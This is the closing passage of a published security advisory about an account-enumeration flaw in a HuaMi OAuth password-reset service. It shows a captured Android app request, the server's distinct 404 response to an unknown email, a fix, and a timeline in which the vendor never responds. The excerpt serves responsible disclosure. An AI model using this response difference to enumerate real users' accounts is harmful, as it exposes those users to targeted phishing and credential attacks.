Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)<br />Accept-Encoding: gzip, deflate<br />Content-Length: 0<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />The server response to an invalid email address:<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />HTTP/2 404 Not Found<br />Date: Mon, 30 Aug 2021 12:40:08 GMT<br />Content-Type: application/json<br />Content-Length: 39<br />Vary: Origin<br />Vary: Access-Control-Request-Method<br />Vary: Access-Control-Request-Headers<br /><br />"HuaMi Oauth / User Registration 2.0.2"<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br /><br />Solution / Workaround<br />#####################<br /><br />Ensure the application returns a consistent message for both existent and<br />non-existent accounts during the password reset process.<br /><br /><br />History<br />#######<br /><br />2021-08-30: Vulnerability found & advisory created<br />2021-09-24: Vendor contacted<br />2021-10-25: Vendor contacted again<br />2021-11-18: Vendor contacted again<br />2022-04-27: No reaction from vendor, advisory published<br /></code></pre>